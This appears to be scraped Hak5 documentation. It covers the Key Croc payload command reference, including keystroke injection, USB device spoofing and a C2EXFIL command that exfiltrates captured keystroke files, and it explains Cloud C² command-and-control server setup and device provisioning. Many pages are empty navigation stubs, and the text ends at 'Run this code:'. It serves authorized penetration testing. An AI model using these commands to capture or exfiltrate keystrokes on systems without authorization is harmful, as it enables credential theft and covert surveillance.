### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#example-2)
`QUACK STRING hello world`
Will inject keystrokes specified. See the [QUACK article](https://docs.hak5.org/hc/en-us/articles/360047381354)
for full usage.
QUACKFILE [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#quackfile)
-------------------------------------------------------------------------------------------------------
`QUACKFILE `
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#example-3)
`QUACK /root/udisk/payloads/my_ducky_script.txt`
Will inject keystrokes from the specified file. Ducky Script commands in the specified file should not be prepended with Q or QUACK.
ATTACKMODE [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#attackmode)
---------------------------------------------------------------------------------------------------------
`ATTACKMODE `
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#example-4)
`ATTACKMODE HID ECM_ETHERNET VID_0X05AC PID_0X021E MAN_Hak5 SN_1337`
Will emulate a USB device from the specified modes and options. See the [ATTACKMODE article](https://docs.hak5.org/hc/en-us/articles/360048016053)
for full usage.
LED [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#led)
-------------------------------------------------------------------------------------------
`LED `
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#example-5)
`LED SETUP`
Will control the multi-color LED. See the [LED article](https://docs.hak5.org/hc/en-us/articles/360047383854)
for full usage.
GET\_VARS [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#get_vars)
------------------------------------------------------------------------------------------------------
`GET_VARS`
Will return a set of useful variables which may be referenced in the payload
* `$VID` – Vendor ID cloned from attached keyboard or specified in config.txt
* `$PID` – Product ID cloned from attached keyboard or specified in config.txt
* `$MAN` – Manufacturer specified in config.txt
* `$SN` – Serial number specified in config.txt
* `$PROD` – Product string specified in config.txt
* `$HOST_IP` – IP address of Key Croc after executing an Ethernet `ATTACKMODE`
* `$TARGET_IP` – IP address of target after executing an Ethernet `ATTACKMODE`
* `$TARGET_HOSTNAME` – Host name of the target after executing an Ethernet `ATTACKMODE`
info
The `$LOOT` variable is always available after `MATCH` triggers the payload. See the [MATCH article](https://docs.hak5.org/key-croc/writing-payloads/the-match-command/)
for `$LOOT` details.
RELOAD\_PAYLOADS [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#reload_payloads)
--------------------------------------------------------------------------------------------------------------------
`RELOAD_PAYLOADS`
Will refresh the Key Croc framework with payload files from /root/udisk/payloads/
CHECK\_PAYLOADS [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#check_payloads)
------------------------------------------------------------------------------------------------------------------
`CHECK_PAYLOADS`
Will check the syntax of the payloads currently residing in /root/udisk/payloads/
RECORD\_PAYLOAD [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#record_payload)
------------------------------------------------------------------------------------------------------------------
`RECORD_PAYLOAD`
Will parse each line entered, enabling interactive payload development with helpers.
ENABLE\_PAYLOAD [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#enable_payload)
------------------------------------------------------------------------------------------------------------------
`ENABLE_PAYLOAD `
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#example-6)
`ENABLE_PAYLOAD my_payload.txt`
Will enable the specified payload. After enabling a payload, issue RELOAD\_PAYLOADS for the change to take effect.
DISABLE\_PAYLOAD [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#disable_payload)
--------------------------------------------------------------------------------------------------------------------
`DISABLE_PAYLOAD `
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#example-7)
`DISABLE_PAYLOAD my_payload.txt`
After disabling a payload, issue `RELOAD_PAYLOADS` for the change to take effect.
INSTALL\_EXTRAS [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#install_extras)
------------------------------------------------------------------------------------------------------------------
`INSTALL_EXTRAS`
Will install additional third party software such as metasploit, impacket and responder to the `/tools/` directory.
KEYBOARD [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#keyboard)
-----------------------------------------------------------------------------------------------------
`KEYBOARD`
Will return `PRESENT` or `MISSING` depending on whether a keyboard is attached.
UDISK [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#udisk)
-----------------------------------------------------------------------------------------------
`udisk [ mount | unmount | remount | reformat ]`
WAIT\_FOR\_KEYBOARD\_ACTIVITY [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#wait_for_keyboard_activity)
--------------------------------------------------------------------------------------------------------------------------------------------
`WAIT_FOR_KEYBOARD_ACTIVITY `
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#example-8)
`WAIT_FOR_KEYBOARD_ACTIVITY 1`
Will check for keyboard activity for each specified time interval, halting further payload execution until keyboard activity is detected. Example wait until there is keyboard activity within a 1 second window.
WAIT\_FOR\_KEYBOARD\_INACTIVITY [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#wait_for_keyboard_inactivity)
------------------------------------------------------------------------------------------------------------------------------------------------
`WAIT_FOR_KEYBOARD_INACTIVITY `
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#example-9)
`WAIT_FOR_KEYBOARD_INACTIVITY 300`
Will check for keyboard inactivity, halting further payload execution until the specified time has elapsed with no keyboard activity. Example will wait until there have been no keypresses for 5 minutes (300 seconds)
WAIT\_FOR\_LOOT [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#wait_for_loot)
-----------------------------------------------------------------------------------------------------------------
`WAIT_FOR_LOOT (optional)`
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#example-10)
`WAIT_FOR_LOOT /root/loot/captured_keys.txt 5`
Will wait for the specified file to exist, or if already existing for the file line count to increase, halting further payload execution. Can be used in conjunction with `SAVEKEYS NEXT,` which will write the loot file when the number of specified keys have been typed. Example will wait until the `captured_keys.txt`file exists, checking every 5 seconds.
C2NOTIFY [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#c2notify)
-----------------------------------------------------------------------------------------------------
`C2NOTIFY `
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#example-11)
`C2NOTIFY INFO 'The cake is a lie'`
Will send a notification to the configured Cloud C2 server. See the [Configuring Cloud C2 article](https://docs.hak5.org/hc/en-us/articles/360047380674)
.
C2EXFIL [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#c2exfil)
---------------------------------------------------------------------------------------------------
`C2EXFIL (optional)STRING (required) (optional)`
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/#example-12)
`C2EXFIL STRING /root/loot/captured_keys.txt My_Payload`
Will exfiltrate the specified file to the configured Cloud C2 server. See the [Configuring Cloud C2 article](https://docs.hak5.org/key-croc/writing-payloads/configuring-cloud-c.md)
.
* * *
[_navigate\_before_ Ducky Script Commands](https://docs.hak5.org/key-croc/writing-payloads/ducky-script-commands/)
[The MATCH Command _navigate\_next_](https://docs.hak5.org/key-croc/writing-payloads/the-match-command/)
---
# Getting Started | Hak5 - Payload Studio
[](https://docs.hak5.org/payload-studio/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Getting Started
===============
* * *
---
# Getting Started | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Getting Started
===============
* * *
---
# Setup Guides | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Setup Guides
============
* * *
---
# Customization | Hak5 - Payload Studio
[](https://docs.hak5.org/payload-studio/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Customization
=============
* * *
---
# Troubleshooting | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Troubleshooting
===============
* * *
---
# Basics | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Basics
======
* * *
---
# Adding Devices | Hak5 - Cloud C²
[](https://docs.hak5.org/cloud-c2/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Adding Devices
==============
report
Any networking configuration changes to your Cloud C² Server (hostname, port, protocol) **REQUIRE** you to redeploy your _device.config_ to any previously connected devices – as it contains the information to properly communicate with C²
Begin by logging in to the Cloud C² web interface.
* From the device listing tab, click the (+) Add Device button
* Name the device, select the device type (e.g. WiFi Pineapple, Shark Jack), add an optional description and click Add Device\\

* Click the on the name of the newly added device from the device listing tab
* From the devices tab, click the setup button to download the `device.config` provisioning file\\
* Copy the `device.config` provisioning file to the device’s `/etc/` directory

For example:
WIFI PINEAPPLE [_link_](https://docs.hak5.org/cloud-c2/getting-started/adding-devices/index.html#wifi-pineapple)
-----------------------------------------------------------------------------------------------------------------
WiFi Pineapple – put `device.config` in `/etc/`
`scp device.config root@172.16.42.1:/etc/`
**WIFI PINEAPPLE MARK VII and WIFI PINEAPPLE ENTERPRISE**
With the WiFi Pineapple Mark VII, in addition to the above scp example, the `device.config` provisioning file may be uploaded from the web interface via the settings page.
LAN TURTLE [_link_](https://docs.hak5.org/cloud-c2/getting-started/adding-devices/index.html#lan-turtle)
---------------------------------------------------------------------------------------------------------
LAN Turtle – put `device.config` in `/etc/`
`scp device.config root@172.16.84.1:/etc/`
PACKET SQUIRREL [_link_](https://docs.hak5.org/cloud-c2/getting-started/adding-devices/index.html#packet-squirrel)
-------------------------------------------------------------------------------------------------------------------
Packet Squirrel – put `device.config` in `/etc/`
`scp device.config root@172.16.32.1:/etc/`
SHARK JACK [_link_](https://docs.hak5.org/cloud-c2/getting-started/adding-devices/index.html#shark-jack)
---------------------------------------------------------------------------------------------------------
Shark Jack – put `device.config` in `/etc/` and use `C2CONNECT` in your payload
`scp device.config root@172.16.24.1:/etc/`
Then add the following to your payload:
`C2CONNECT`
SIGNAL OWL [_link_](https://docs.hak5.org/cloud-c2/getting-started/adding-devices/index.html#signal-owl)
---------------------------------------------------------------------------------------------------------
Signal Owl – put `device.config` in `/etc/` and use `C2CONNECT` in your payload
`scp device.config root@172.16.56.1:/etc/`
Then add the following to your payload:
`C2CONNECT`
SCREEN CRAB [_link_](https://docs.hak5.org/cloud-c2/getting-started/adding-devices/index.html#screen-crab)
-----------------------------------------------------------------------------------------------------------
Copy the `device.config` file to the root of the Micro SD card.
KEY CROC [_link_](https://docs.hak5.org/cloud-c2/getting-started/adding-devices/index.html#key-croc)
-----------------------------------------------------------------------------------------------------
Copy the `device.config` file to the root of the udisk in arming mode.
Deploy the device with Internet access as per usual and upon bootup the device will connect to this Cloud C² instance.
* * *
[_navigate\_before_ Installation And Setup](https://docs.hak5.org/cloud-c2/getting-started/installation-and-setup/)
[Navigating The Interface _navigate\_next_](https://docs.hak5.org/cloud-c2/getting-started/navigating-the-interface/)
---
# Getting Started | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Getting Started
===============
* * *
---
# Writing Payloads | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Writing Payloads
================
* * *
---
# Attack Mode | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Attack Mode
===========
* * *
---
# Software Updates | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Software Updates
================
* * *
---
# Trouble Shooting | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Trouble Shooting
================
* * *
---
# Beginner Guides | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Beginner Guides
===============
* * *
---
# Video Guides | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Video Guides
============
* * *
---
# Internet Connectivity | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Internet Connectivity
=====================
* * *
---
# Files And Directory Structure | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Files And Directory Structure
=============================
* * *
---
# Writing Payloads | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Writing Payloads
================
* * *
---
# Tips And Tricks | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Tips And Tricks
===============
* * *
---
# Beginner Guides | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Beginner Guides
===============
* * *
---
# Getting Started | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Getting Started
===============
* * *
---
# The ATTACKMODE Command | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
The ATTACKMODE Command
======================
* * *
---
# Software Updates | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Software Updates
================
* * *
---
# Writing Payloads | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Writing Payloads
================
* * *
---
# Internet Connectivity | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Internet Connectivity
=====================
* * *
---
# Software Updates | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Software Updates
================
* * *
---
# Managing Payloads | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Managing Payloads
=================
* * *
---
# Beginner Guides | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Beginner Guides
===============
* * *
---
# Video Guides | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Video Guides
============
* * *
---
# Configuration | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Configuration
=============
* * *
---
# Product Information | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Product Information
===================
* * *
---
# Troubleshooting | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Troubleshooting
===============
* * *
---
# Tips And Tricks | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Tips And Tricks
===============
* * *
---
# Payload Development | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Payload Development
===================
* * *
---
# Default Payloads | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Default Payloads
================
* * *
---
# Getting Started | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Getting Started
===============
* * *
---
# Faq Troubleshooting | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_rocket\_launch_
Faq Troubleshooting
===================
* * *
---
# Cloud C2 Basics | Hak5 - Cloud C²
[](https://docs.hak5.org/cloud-c2/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Cloud C2 Basics
===============
Cloud C² is a self-hosted web-based command and control suite for networked Hak5 gear that lets you pentest from anywhere.
Linux, Mac and Windows computers can host the Cloud C² server while Hak5 gear such as the WiFi Pineapple, LAN Turtle and Packet Squirrel can be provisioned as clients.
Once you have the Cloud C² server running on a public-facing machine (such as a VPS) and the Hak5 devices are provisioned and deployed, you can login to the Cloud C² web interface to manage these devices as if you were directly connected.
With multiple Hak5 devices deployed at a client site, aggregated data provides a big picture view of the wired and wireless environments.
* * *
[_navigate\_before_ Cloud C² by Hak5](https://docs.hak5.org/cloud-c2/cloud-c-by-hak5/)
[Licensing And Downloads _navigate\_next_](https://docs.hak5.org/cloud-c2/getting-started/licensing-and-downloads/)
---
# Cloud C² by Hak5 | Hak5 - Cloud C²
[](https://docs.hak5.org/cloud-c2/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Cloud C² by Hak5
================
Cloud C² makes it easy for pen testers and IT security teams to deploy and manage fleets of Hak5 gear from a simple cloud dashboard.

Getting Started [_link_](https://docs.hak5.org/cloud-c2/cloud-c-by-hak5/#getting-started)
------------------------------------------------------------------------------------------
* [Cloud C² Basics](https://docs.hak5.org/cloud-c2/getting-started/cloud-c2-basics/)
* [Licensing and Downloads](https://docs.hak5.org/cloud-c2/getting-started/licensing-and-downloads/)
* [Installation and Setup](https://docs.hak5.org/cloud-c2/getting-started/installation-and-setup/)
* [Adding Devices](https://docs.hak5.org/cloud-c2/getting-started/adding-devices/)
* [Navigating the Interface](https://docs.hak5.org/cloud-c2/getting-started/navigating-the-interface/)
* [Managing Devices](https://docs.hak5.org/cloud-c2/getting-started/managing-devices/)
Guides [_link_](https://docs.hak5.org/cloud-c2/cloud-c-by-hak5/#guides)
------------------------------------------------------------------------
* [Quick Deployment on an Amazon Lightsail VPS](https://docs.hak5.org/cloud-c2/guides/quick-deployment-on-an-amazon-lightsail-vps/)
* [Let’s Encrypt SSL configuration and device enrollment](https://docs.hak5.org/cloud-c2/guides/lets-encrypt-ssl-configuration-and-device-enrollment/)
* [Enabling Cloud C² as a service on boot and Exfiltration](https://docs.hak5.org/cloud-c2/guides/enabling-cloud-c2-as-a-service-on-boot-and-exfiltration/)
* [Cloud C² Setup with Self-Signed SSL certificates](https://docs.hak5.org/cloud-c2/guides/cloud-c2-setup-with-self-signed-ssl-certificates/)
* [Installing updates to the Cloud C² Server](https://docs.hak5.org/cloud-c2/guides/installing-updates-to-the-cloud-c2-server/)
* [Upgrading Cloud C² Editions](https://docs.hak5.org/cloud-c2/guides/upgrading-cloud-c2-editions/)
Troubleshooting [_link_](https://docs.hak5.org/cloud-c2/cloud-c-by-hak5/#troubleshooting)
------------------------------------------------------------------------------------------
* [Device cannot connect to server](https://docs.hak5.org/cloud-c2/troubleshooting/device-cannot-connect-to-server/)
* [Account Recovery](https://docs.hak5.org/cloud-c2/troubleshooting/account-recovery/)
Extras [_link_](https://docs.hak5.org/cloud-c2/cloud-c-by-hak5/#extras)
------------------------------------------------------------------------
* [Icon Sets](https://docs.hak5.org/cloud-c2/extras/icon-sets/)
* * *
[Cloud C2 Basics _navigate\_next_](https://docs.hak5.org/cloud-c2/getting-started/cloud-c2-basics/)
---
# Licensing And Downloads | Hak5 - Cloud C²
[](https://docs.hak5.org/cloud-c2/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Licensing And Downloads
=======================
### Downloads [_link_](https://docs.hak5.org/cloud-c2/getting-started/licensing-and-downloads/#downloads)
check\_circle
The latest Cloud C² Server may also be downloaded from [https://downloads.hak5.org/cloudc2](https://downloads.hak5.org/cloudc2)
The download link will provide a ZIP file containing your Cloud C² edition for Windows, Mac and Linux hosts.
Cloud C² is available as an instant download. A free license for **Community** Edition is available which is _not for commercial use_ and comes with community support. The **Professional** and **Teams** Editions are for _commercial use_ with standard support.
### Getting a license [_link_](https://docs.hak5.org/cloud-c2/getting-started/licensing-and-downloads/#getting-a-license)
Start by [adding your desired Cloud C² edition to cart](https://shop.hak5.org/products/c2#c2-versions)
and checking out as usual. Orders may be placed with or without new hardware. In either case, the Cloud C² license key and download link will be delivered by email instantly.
After placing the order, an email from **[shop@hak5.org](mailto:shop@hak5.org)
** with the subject line “**Hak5 Cloud C² Download & License**” will be sent containing a download link and license key.

If you do not notice this email right away, check your junk mail box and search for the email by address and subject. In Gmail, the query “`in:spam from:shop@hak5.org`” may reveal the message.
If you do notice that your email provider has marked it as spam we would appreciate it if you could use any provided options by the email client to report as not spam.
* * *
[_navigate\_before_ Cloud C2 Basics](https://docs.hak5.org/cloud-c2/getting-started/cloud-c2-basics/)
[Installation And Setup _navigate\_next_](https://docs.hak5.org/cloud-c2/getting-started/installation-and-setup/)
---
# Navigating The Interface | Hak5 - Cloud C²
[](https://docs.hak5.org/cloud-c2/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Navigating The Interface
========================
Hak5 Cloud C² is navigable using most modern web browsers including mobile devices. By default two page tabs are available across the top. From the home tab you will find information and statistics across the aggregate of your device fleet as well as news and bulletins from Hak5.
From the devices tab you will find a sortable, filterable table listing of devices associated with the Cloud C² instance. Clicking on a device’s row will open a new tab with management functions specific to that device. From a device’s tab you will find a menu containing device management buttons, as well as headings for the various features supported by that device.
* * *
[_navigate\_before_ Adding Devices](https://docs.hak5.org/cloud-c2/getting-started/adding-devices/)
[Managing Devices _navigate\_next_](https://docs.hak5.org/cloud-c2/getting-started/managing-devices/)
---
# Installation And Setup | Hak5 - Cloud C²
[](https://docs.hak5.org/cloud-c2/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Installation And Setup
======================
One of the best things about Cloud C² is that installation is easy. There is no installer and no complicated dependencies needed to be satisfied.
Rather, Cloud C² is a single executable with startup parameters passed as command line arguments. Upon first run, a database file will be created automatically. This way Cloud C² is portable and easy to manage.
To start, determine where the Cloud C² server will live. This will need to be a machine that can be accessed by both you and the deployed Hak5 devices. Typically a small VPS or other Internet-facing server will be used, though there are circumstances where a private-network only server may be desired.
In this example setup, we’ll assume that we’re using an Internet facing Linux server, though the setup process will be similar for Mac and Windows as all versions of the cross-platform Cloud C² server accept the same command-line arguments.
Start by connecting to the server by SSH or similar, then from the server download the latest version of the Cloud C²
`wget -q https://c2.hak5.org/download/latest -O cloudc2.zip unzip cloudc2.zip`

Running the Cloud C² binary without any arguments will show the usage.
`Usage of ./c2-3.2.0_amd64_linux: -certFile string Custom SSL Certificate file (disabled letsencrypt) -db string Path to the c2 database (default "c2.db") -debug Enable server side debug logs. This will affect performance, only use while actively troubleshooting. Setting this sets -v automatically -hostname string REQUIRED - Hostname of server (ip or DNS name) -https Enable https (requires ports 80 and 443) -keyFile string Custom SSL Key file (disables letsencrypt) -listenip string IP address to listen on (default "0.0.0.0") -listenport string Port of the HTTP server (default "8080") -recoverAccount string username to recover, specify a new password with -setPass -reverseProxy If set, Cloud C2 will work behind a reverse proxy -reverseProxyPort string If reverseProxyPort is set, this port will be the internet facing port the Cloud C2 will be available at -setEdition string used to update a license key edition from the command line if UI fails -setLicenseKey string used to update a license key from the command line if UI fails -setPass string password to set for user specified by name using the -recoverAccount argument -sshport string Port of the SSH server (default "2022") -v Set to get timestamped stdout output`
At a minimum, Cloud C² must be run with the (`-hostname`) argument. This may be either an IP address or DNS name. If a DNS name is used, HTTPS may be enabled — either by supplying a custom SSL certificate file (`-certFile`), or by generating a Let’s Encrypt certificate (`-https`). In our example, we’ll choose a DNS name and the HTTPS option.

info
In this example, the hostname hak5.org is supplied. Replace this value with your server’s hostname — whether its public IP address or a domain name.
warning
HTTPS requires a domain name. If your server does not have a domain, omit the `-https` option and use the server’s public IP address with the `-hostname` parameter.
The first time Cloud C² runs, a database file is generated. This will either be named c2.db automatically in the same directory as the Cloud C² binary, or as specified by the (`-db`) command line argument.
A setup security token will also display. This is important and will be needed to complete setup, so you may want to copy it to your clipboard.
SETUP [_link_](https://docs.hak5.org/cloud-c2/getting-started/installation-and-setup/#setup)
---------------------------------------------------------------------------------------------
With Cloud C² now running, browse the the hostname of the server. You will be prompted for the setup token printed from the command line, as well as the license key provided by email. To complete setup, create an account, a default site, accept the license agreements and click Save.

With setup complete, you may now login.

At this point the Cloud C² server is running. You may wish to [add devices](https://docs.hak5.org/cloud-c2/getting-started/adding-devices/)
, learn about [navigating the interface](https://docs.hak5.org/cloud-c2/getting-started/navigating-the-interface/)
and [managing devices](https://docs.hak5.org/cloud-c2/getting-started/managing-devices/)
.
report
With the above example command, the Cloud C² server will be running in an interactive shell. As a result, the server will stop when the session is terminated. To keep the server running when logged out, follow the guide to [enable Cloud C² as a service on boot](https://docs.hak5.org/cloud-c2/guides/enabling-cloud-c2-as-a-service-on-boot-and-exfiltration/)
.
* * *
[_navigate\_before_ Licensing And Downloads](https://docs.hak5.org/cloud-c2/getting-started/licensing-and-downloads/)
[Adding Devices _navigate\_next_](https://docs.hak5.org/cloud-c2/getting-started/adding-devices/)
---
# Managing Devices | Hak5 - Cloud C²
[](https://docs.hak5.org/cloud-c2/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Managing Devices
================
From a device’s tab you will find buttons to setup, rename, reboot, remove and wipe the device.
**Setup** - Download the device.config file to provision the device
**Rename** - Change the 32 character name of the device
**Reboot** - Remotely restart the device
**Wipe** - Factory reset the device
**Remove** - Delete the device from the Cloud C² listing.
* * *
[_navigate\_before_ Navigating The Interface](https://docs.hak5.org/cloud-c2/getting-started/navigating-the-interface/)
[Quick Deployment On An Amazon Lightsail Vps _navigate\_next_](https://docs.hak5.org/cloud-c2/guides/quick-deployment-on-an-amazon-lightsail-vps/)
---
# Quick Deployment On An Amazon Lightsail Vps | Hak5 - Cloud C²
[](https://docs.hak5.org/cloud-c2/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Quick Deployment On An Amazon Lightsail Vps
===========================================
info
This guide shows a quick way to get setup with Cloud C² on Amazon Lightsail. It’s not comprehensive, and it assumes you’re savvy in the cloud & command line.
VIDEO GUIDE [_link_](https://docs.hak5.org/cloud-c2/guides/quick-deployment-on-an-amazon-lightsail-vps/#video-guide)
---------------------------------------------------------------------------------------------------------------------
HOW DO I GET CLOUD C² [_link_](https://docs.hak5.org/cloud-c2/guides/quick-deployment-on-an-amazon-lightsail-vps/#how-do-i-get-cloud-c)
----------------------------------------------------------------------------------------------------------------------------------------
Go to [https://shop.hak5.org/cart/add?id=12992425820273](https://shop.hak5.org/cart/add?id=12992425820273)
and checkout to get a license key emailed to you. Then go to [https://downloads.hak5.org/cloudc2](https://downloads.hak5.org/cloudc2)
to download the latest – or just run the code below.
I ALREADY HAVE A VPS [_link_](https://docs.hak5.org/cloud-c2/guides/quick-deployment-on-an-amazon-lightsail-vps/#i-already-have-a-vps)
---------------------------------------------------------------------------------------------------------------------------------------
Run this code:
